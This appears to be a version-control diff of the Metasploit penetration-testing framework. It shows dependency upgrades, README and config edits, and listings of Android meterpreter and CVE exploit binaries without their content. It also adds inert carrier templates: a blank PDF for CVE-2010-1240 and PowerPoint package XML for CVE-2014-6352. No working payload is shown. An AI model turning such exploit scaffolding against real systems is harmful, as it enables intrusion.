    jsobfu (0.2.1)
      rkelly-remix (= 0.0.6)
-    json (1.8.1)
-    mail (2.5.4)
-      mime-types (~> 1.16)
-      treetop (~> 1.4.8)
-    metasploit-concern (0.3.0)
-      activesupport (~> 3.0, >= 3.0.0)
-      railties (< 4.0.0)
-    metasploit-credential (0.12.0)
-      metasploit-concern (~> 0.3.0)
-      metasploit-model (~> 0.28.0)
-      metasploit_data_models (~> 0.21.0)
+    json (1.8.3)
+    mail (2.6.3)
+      mime-types (>= 1.16, < 3)
+    metasm (1.0.2)
+    metasploit-concern (1.0.0)
+      activerecord (>= 4.0.9, < 4.1.0)
+      activesupport (>= 4.0.9, < 4.1.0)
+      railties (>= 4.0.9, < 4.1.0)
+    metasploit-credential (1.0.1)
+      metasploit-concern (~> 1.0)
+      metasploit-model (~> 1.0)
+      metasploit_data_models (~> 1.0)
      pg
-      railties (< 4.0.0)
+      railties
      rubyntlm
      rubyzip (~> 1.1)
-    metasploit-model (0.28.0)
-      activesupport
-      railties (< 4.0.0)
-    metasploit_data_models (0.21.1)
-      activerecord (>= 3.2.13, < 4.0.0)
-      activesupport
+    metasploit-model (1.0.0)
+      activemodel (>= 4.0.9, < 4.1.0)
+      activesupport (>= 4.0.9, < 4.1.0)
+      railties (>= 4.0.9, < 4.1.0)
+    metasploit-payloads (1.0.12)
+    metasploit_data_models (1.2.5)
+      activerecord (>= 4.0.9, < 4.1.0)
+      activesupport (>= 4.0.9, < 4.1.0)
      arel-helpers
-      metasploit-concern (~> 0.3.0)
-      metasploit-model (~> 0.28.0)
+      metasploit-concern (~> 1.0)
+      metasploit-model (~> 1.0)
      pg
-      railties (< 4.0.0)
-      recog (~> 1.0)
-    meterpreter_bins (0.0.10)
+      postgres_ext
+      railties (>= 4.0.9, < 4.1.0)
+      recog (~> 2.0)
    method_source (0.8.2)
-    mime-types (1.25.1)
-    mini_portile (0.6.0)
-    msgpack (0.5.9)
-    multi_json (1.0.4)
+    mime-types (2.6.1)
+    mini_portile (0.6.2)
+    minitest (4.7.5)
+    msgpack (0.6.2)
+    multi_json (1.11.2)
+    multi_test (0.1.2)
    network_interface (0.0.1)
-    nokogiri (1.6.3.1)
-      mini_portile (= 0.6.0)
-    packetfu (1.1.9)
-    pcaprub (0.11.3)
-    pg (0.17.1)
-    polyglot (0.3.5)
-    pry (0.10.0)
+    nokogiri (1.6.6.2)
+      mini_portile (~> 0.6.0)
+    packetfu (1.1.11)
+      network_interface (~> 0.0)
+      pcaprub (~> 0.12)
+    pcaprub (0.12.0)
+    pg (0.18.3)
+    pg_array_parser (0.0.9)
+    postgres_ext (2.4.1)
+      activerecord (>= 4.0.0)
+      arel (>= 4.0.1)
+      pg_array_parser (~> 0.0.9)
+    pry (0.10.1)
      coderay (~> 1.1.0)
      method_source (~> 0.8.1)
      slop (~> 3.4)
-    rack (1.4.5)
-    rack-cache (1.2)
-      rack (>= 0.4)
-    rack-ssl (1.3.4)
-      rack
-    rack-test (0.6.2)
+    rack (1.5.5)
+    rack-test (0.6.3)
      rack (>= 1.0)
-    rails (3.2.19)
-      actionmailer (= 3.2.19)
-      actionpack (= 3.2.19)
-      activerecord (= 3.2.19)
-      activeresource (= 3.2.19)
-      activesupport (= 3.2.19)
-      bundler (~> 1.0)
-      railties (= 3.2.19)
-    railties (3.2.19)
-      actionpack (= 3.2.19)
-      activesupport (= 3.2.19)
-      rack-ssl (~> 1.3.2)
+    rails (4.0.13)
+      actionmailer (= 4.0.13)
+      actionpack (= 4.0.13)
+      activerecord (= 4.0.13)
+      activesupport (= 4.0.13)
+      bundler (>= 1.3.0, < 2.0)
+      railties (= 4.0.13)
+      sprockets-rails (~> 2.0)
+    railties (4.0.13)
+      actionpack (= 4.0.13)
+      activesupport (= 4.0.13)
      rake (>= 0.8.7)
-      rdoc (~> 3.4)
-      thor (>= 0.14.6, < 2.0)
-    rake (10.3.2)
-    rdoc (3.12.2)
-      json (~> 1.4)
-    recog (1.0.0)
+      thor (>= 0.18.1, < 2.0)
+    rake (10.4.2)
+    rb-readline-r7 (0.5.2.0)
+    recog (2.0.6)
      nokogiri
-    redcarpet (3.1.2)
+    redcarpet (3.2.3)
    rkelly-remix (0.0.6)
    robots (0.10.1)
    rspec (2.99.0)
      rspec-core (~> 2.99.0)
      rspec-expectations (~> 2.99.0)
      rspec-mocks (~> 2.99.0)
-    rspec-collection_matchers (1.0.0)
+    rspec-collection_matchers (1.1.2)
      rspec-expectations (>= 2.99.0.beta1)
-    rspec-core (2.99.1)
+    rspec-core (2.99.2)
    rspec-expectations (2.99.2)
      diff-lcs (>= 1.1.3, < 2.0)
-    rspec-mocks (2.99.2)
+    rspec-mocks (2.99.3)
    rspec-rails (2.99.0)
      actionpack (>= 3.0)
      activemodel (>= 3.0)
@ -187,53 +202,52 @@ GEM
      rspec-core (~> 2.99.0)
      rspec-expectations (~> 2.99.0)
      rspec-mocks (~> 2.99.0)
-    rubyntlm (0.4.0)
-    rubyzip (1.1.6)
-    shoulda-matchers (2.6.2)
-    simplecov (0.5.4)
-      multi_json (~> 1.0.3)
-      simplecov-html (~> 0.5.3)
-    simplecov-html (0.5.3)
+    rubyntlm (0.5.2)
+    rubyzip (1.1.7)
+    shoulda-matchers (2.8.0)
+      activesupport (>= 3.0.0)
+    simplecov (0.9.2)
+      docile (~> 1.1.0)
+      multi_json (~> 1.0)
+      simplecov-html (~> 0.9.0)
+    simplecov-html (0.9.0)
    slop (3.6.0)
-    sprockets (2.2.2)
+    sprockets (2.12.3)
      hike (~> 1.2)
      multi_json (~> 1.0)
      rack (~> 1.0)
      tilt (~> 1.1, != 1.3.0)
-    sqlite3 (1.3.9)
+    sprockets-rails (2.2.4)
+      actionpack (>= 3.0)
+      activesupport (>= 3.0)
+      sprockets (>= 2.8, < 4.0)
+    sqlite3 (1.3.10)
    thor (0.19.1)
+    thread_safe (0.3.5)
    tilt (1.4.1)
-    timecop (0.7.1)
-    treetop (1.4.15)
-      polyglot
-      polyglot (>= 0.3.1)
-    tzinfo (0.3.41)
+    timecop (0.7.3)
+    tzinfo (0.3.44)
    xpath (2.0.0)
      nokogiri (~> 1.3)
-    yard (0.8.7.4)
+    yard (0.8.7.6)

 PLATFORMS
  ruby

 DEPENDENCIES
-  activerecord (>= 3.0.0, < 4.0.0)
  aruba
  cucumber-rails
-  factory_girl (>= 4.1.0)
-  factory_girl_rails
+  factory_girl_rails (~> 4.5.0)
  fivemat (= 1.2.1)
-  metasploit-credential (~> 0.12.0)
  metasploit-framework!
-  metasploit_data_models (~> 0.21.1)
-  network_interface (~> 0.0.1)
-  pcaprub
-  pg (>= 0.11)
+  metasploit-framework-db!
+  metasploit-framework-pcap!
  pry
  rake (>= 10.0.0)
  redcarpet
  rspec (>= 2.12, < 3.0.0)
  rspec-rails (>= 2.12, < 3.0.0)
  shoulda-matchers
-  simplecov (= 0.5.4)
+  simplecov
  timecop
  yard
--- a/6
+++ b/6
@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2014, Rapid7, Inc.
+Copyright: 2006-2015, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@ -32,10 +32,6 @@ Copyright: 2003-2010 Mark Borgerding
           2009-2012 H D Moore <hdm[at]rapid7.com>
 License: BSD-3-clause

-Files: external/ruby-lorcon/*
-Copyright: 2005, dragorn and Joshua Wright
-License: LGPL-2.1
-
 Files: external/source/exploits/IE11SandboxEscapes/*
 Copyright: James Forshaw, 2014
 License: GPLv3
--- a/README.md
+++ b/README.md
@ -1,32 +1,27 @@
-
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.png)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://codeclimate.com/badge.png)](https://codeclimate.com/github/rapid7/metasploit-framework)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.png?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://codeclimate.com/badge.png)](https://codeclimate.com/github/rapid7/metasploit-framework)
 ==
 The Metasploit Framework is released under a BSD-style license. See
 COPYING for more details.

-The latest version of this software is available from http://metasploit.com/
+The latest version of this software is available from: https://metasploit.com

 Bug tracking and development information can be found at:
- https://dev.metasploit.com/redmine/projects/framework/
-
-The public GitHub source repository can be found at:
 https://github.com/rapid7/metasploit-framework

+New bugs and feature requests should be directed to:
+  http://r-7.co/MSF-BUGv1
+
+API documentation for writing modules can be found at:
+  https://rapid7.github.io/metasploit-framework/api
+
 Questions and suggestions can be sent to:
- msfdev(at)metasploit.com
-
-The framework mailing list is the place to discuss features and ask for help.
-To subscribe, visit the following web page:
- https://mail.metasploit.com/mailman/listinfo/framework
-
-The mailing list archives are available from:
- https://mail.metasploit.com/pipermail/framework/
+  https://lists.sourceforge.net/lists/listinfo/metasploit-hackers

 Installing
 --

-Generally, you should use [the free installer](https://www.metasploit.com/download)
-which contains all dependencies and will get you up and running with a
+Generally, you should use [the free installer](https://www.metasploit.com/download),
+which contains all of the dependencies and will get you up and running with a
 few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
 you'd like to deal with dependencies on your own.

@ -34,20 +29,19 @@ Using Metasploit
 --
 Metasploit can do all sorts of things. The first thing you'll want to do
 is start `msfconsole`, but after that, you'll probably be best served by
-reading some of the great tutorials online:
-
-  * [Metasploit Unleashed][unleashed]
-  * [The official Metasploit wiki on Github][wiki-start]
+reading [Metasploit Unleashed][unleashed], the [great community
+resources](https://metasploit.github.io), or the [wiki].

 Contributing
 --
-See the [Dev Environment Setup][wiki-devenv] guide on GitHub which will
-walk you through the whole process starting from installing all the
+See the [Dev Environment Setup][wiki-devenv] guide on GitHub, which will
+walk you through the whole process from installing all the
 dependencies, to cloning the repository, and finally to submitting a
-pull request. For slightly more info, see
+pull request. For slightly more information, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).


+[wiki]: https://github.com/rapid7/metasploit-framework/wiki
 [wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
--- a/4
+++ b/4
@ -1,6 +1,7 @@
 #!/usr/bin/env rake
 require File.expand_path('../config/application', __FILE__)
 require 'metasploit/framework/require'
+require 'metasploit/framework/spec/untested_payloads'

 # @note must be before `Metasploit::Framework::Application.load_tasks`
 #
@ -9,3 +10,6 @@ require 'metasploit/framework/require'
 Metasploit::Framework::Require.optionally_active_record_railtie

 Metasploit::Framework::Application.load_tasks
+Metasploit::Framework::Spec::Constants.define_task
+Metasploit::Framework::Spec::Threads::Suite.define_task
+Metasploit::Framework::Spec::UntestedPayloads.define_task
--- a/config/application.rb
+++ b/config/application.rb
@ -9,6 +9,7 @@ all_environments = [

 Bundler.require(
    *Rails.groups(
+        coverage: [:test],
        db: all_environments,
        pcap: all_environments
    )
@ -19,6 +20,7 @@ Bundler.require(
 #

 # For compatibility with jquery-rails (and other engines that need action_view) in pro
+require 'action_controller/railtie'
 require 'action_view/railtie'

 #
@ -33,7 +35,17 @@ module Metasploit
    class Application < Rails::Application
      include Metasploit::Framework::CommonEngine

+      config.paths['log']             = "#{Msf::Config.log_directory}/#{Rails.env}.log"
      config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
+
+      case Rails.env
+      when "development"
+        config.eager_load = false
+      when "test"
+        config.eager_load = false
+      when "production"
+        config.eager_load = true
+      end
    end
  end
 end
--- a/config/boot.rb
+++ b/config/boot.rb
@ -23,15 +23,13 @@ unless ENV['BUNDLE_GEMFILE']
 end

 begin
-  require 'bundler'
+  require 'bundler/setup'
 rescue LoadError
  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
  $stderr.puts "    $ gem install bundler"
-  exit(0)
+  exit(1)
 end

-Bundler.setup
-
 lib_path = root.join('lib').to_path

 unless $LOAD_PATH.include? lib_path
--- a/config/database.yml.example
+++ b/config/database.yml.example
@ -3,8 +3,7 @@
 # these days. (No SQLite, no MySQL).
 #
 # To set up a metasploit database, follow the directions hosted at:
-# https://fedoraproject.org/wiki/Metasploit_Postgres_Setup (Works on
-# essentially any Linux distro, not just Fedora)
+# http://r-7.co/MSF-DEV#set-up-postgresql
 development: &pgsql
  adapter: postgresql
  database: metasploit_framework_development
--- a/data/android/apk/AndroidManifest.xml
+++ b/data/android/apk/AndroidManifest.xml
--- a/data/android/apk/classes.dex
+++ b/data/android/apk/classes.dex
--- a/data/android/apk/resources.arsc
+++ b/data/android/apk/resources.arsc
--- a/data/android/libs/armeabi/libndkstager.so
+++ b/data/android/libs/armeabi/libndkstager.so
--- a/data/android/libs/mips/libndkstager.so
+++ b/data/android/libs/mips/libndkstager.so
--- a/data/android/libs/x86/libndkstager.so
+++ b/data/android/libs/x86/libndkstager.so
--- a/data/android/meterpreter.jar
+++ b/data/android/meterpreter.jar
--- a/data/android/metstage.jar
+++ b/data/android/metstage.jar
--- a/data/android/shell.jar
+++ b/data/android/shell.jar
--- a/data/exploits/CVE-2010-1240/template.pdf
+++ b/data/exploits/CVE-2010-1240/template.pdf
@ -0,0 +1,55 @@
+%PDF-1.0
+1 0 obj
+<<
+	/Pages 2 0 R
+	/Type /Catalog
+>>
+endobj
+2 0 obj
+<<
+	/Count 1
+	/Kids [ 3 0 R ]
+	/Type /Pages
+>>
+endobj
+3 0 obj
+<<
+	/Contents 4 0 R
+	/Parent 2 0 R
+	/Resources <<
+		/Font <<
+			/F1 <<
+				/Type /Font
+				/Subtype /Type1
+				/BaseFont /Helvetica
+				/Name /F1
+			>>
+		>>
+	>>
+	/Type /Page
+	/MediaBox [ 0 0 795 842 ]
+>>
+endobj
+4 0 obj
+<<
+	/Length 0
+>>stream
+
+endstream
+endobj
+xref
+0 5
+0000000000 65535 f
+0000000010 00000 n
+0000000067 00000 n
+0000000136 00000 n
+0000000373 00000 n
+trailer
+<<
+	/Root 1 0 R
+	/Size 5
+	/Info 0 0 R
+>>
+startxref
+429
+%%EOF
--- a/data/exploits/CVE-2014-0515/Graph.swf
+++ b/data/exploits/CVE-2014-0515/Graph.swf
--- a/data/exploits/CVE-2014-0515/msf.swf
+++ b/data/exploits/CVE-2014-0515/msf.swf
--- a/data/exploits/CVE-2014-0556/msf.swf
+++ b/data/exploits/CVE-2014-0556/msf.swf
--- a/data/exploits/CVE-2014-0569/msf.swf
+++ b/data/exploits/CVE-2014-0569/msf.swf
--- a/data/exploits/CVE-2014-0980.pui
+++ b/data/exploits/CVE-2014-0980.pui
--- a/data/exploits/CVE-2014-3153.elf
+++ b/data/exploits/CVE-2014-3153.elf
--- a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
+++ b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
--- a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
+++ b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
--- a/data/exploits/CVE-2014-4404/key_exploit
+++ b/data/exploits/CVE-2014-4404/key_exploit
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/thumbnail" Target="docProps/thumbnail.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="ppt/presentation.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template></Template><TotalTime>37</TotalTime><Words>2</Words><Application>Microsoft Office PowerPoint</Application><PresentationFormat>On-screen Show (4:3)</PresentationFormat><Paragraphs>2</Paragraphs><Slides>1</Slides><Notes>0</Notes><HiddenSlides>0</HiddenSlides><MMClips>0</MMClips><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="6" baseType="variant"><vt:variant><vt:lpstr>Theme</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant><vt:variant><vt:lpstr>Embedded OLE Servers</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant><vt:variant><vt:lpstr>Slide Titles</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="3" baseType="lpstr"><vt:lpstr>Office Theme</vt:lpstr><vt:lpstr>Packager Shell Object</vt:lpstr><vt:lpstr>Example</vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>14.0000</AppVersion></Properties>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title>Example</dc:title><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>9</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2014-08-06T07:56:10Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-12T06:36:10Z</dcterms:modified></cp:coreProperties>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/thumbnail.jpeg
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/thumbnail.jpeg
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/_rels/presentation.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/_rels/presentation.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.wmf"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml
@ -0,0 +1,31 @@
+<xml xmlns:v="urn:schemas-microsoft-com:vml"
+ xmlns:o="urn:schemas-microsoft-com:office:office"
+ xmlns:p="urn:schemas-microsoft-com:office:powerpoint"
+ xmlns:oa="urn:schemas-microsoft-com:office:activation">
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75"
+  o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+  <v:stroke joinstyle="miter"/>
+  <v:formulas>
+   <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+   <v:f eqn="sum @0 1 0"/>
+   <v:f eqn="sum 0 0 @1"/>
+   <v:f eqn="prod @2 1 2"/>
+   <v:f eqn="prod @3 21600 pixelWidth"/>
+   <v:f eqn="prod @3 21600 pixelHeight"/>
+   <v:f eqn="sum @0 0 1"/>
+   <v:f eqn="prod @6 1 2"/>
+   <v:f eqn="prod @7 21600 pixelWidth"/>
+   <v:f eqn="sum @8 21600 0"/>
+   <v:f eqn="prod @7 21600 pixelHeight"/>
+   <v:f eqn="sum @10 21600 0"/>
+  </v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+  <o:lock v:ext="edit" aspectratio="t"/>
+ </v:shapetype><v:shape id="_x0000_s1034" type="#_x0000_t75" style='position:absolute;left:100pt;top:-100pt;width:30pt;height:30pt'>
+  <v:fill color="white" opacity="1" on="f" type="solid"/>
+  <v:stroke on="f"/>
+  <v:imagedata o:relid="rId1" o:title="" croptop="0" cropbottom="0" cropleft="0"
+   cropright="0" grayscale="f" bilevel="f"/>
+  <o:lock v:ext="edit" aspectratio="t" position="f" selection="f" grouping="f"/>
+ </v:shape></xml>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/media/image1.wmf
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/media/image1.wmf
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:presentationPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:extLst><p:ext uri="{E76CE94A-603C-4142-B9EB-6D1370010A27}"><p14:discardImageEditData xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="0"/></p:ext><p:ext uri="{D31A062A-798A-4329-ABDD-BBA856620510}"><p14:defaultImageDpi xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220"/></p:ext><p:ext uri="{FD5EFAAD-0ECE-453E-9831-46B23BE46B34}"><p15:chartTrackingRefBased xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="" val="0"/></p:ext></p:extLst></p:presentationPr>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml
@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" saveSubsetFonts="1"><p:sldMasterIdLst><p:sldMasterId id="2147483648" r:id="rId1"/></p:sldMasterIdLst><p:sldIdLst><p:sldId id="256" r:id="rId2"/></p:sldIdLst><p:sldSz cx="9144000" cy="6858000" type="screen4x3"/><p:notesSz cx="6858000" cy="9144000"/><p:defaultTextStyle><a:defPPr><a:defRPr lang="en-US"/></a:defPPr><a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" 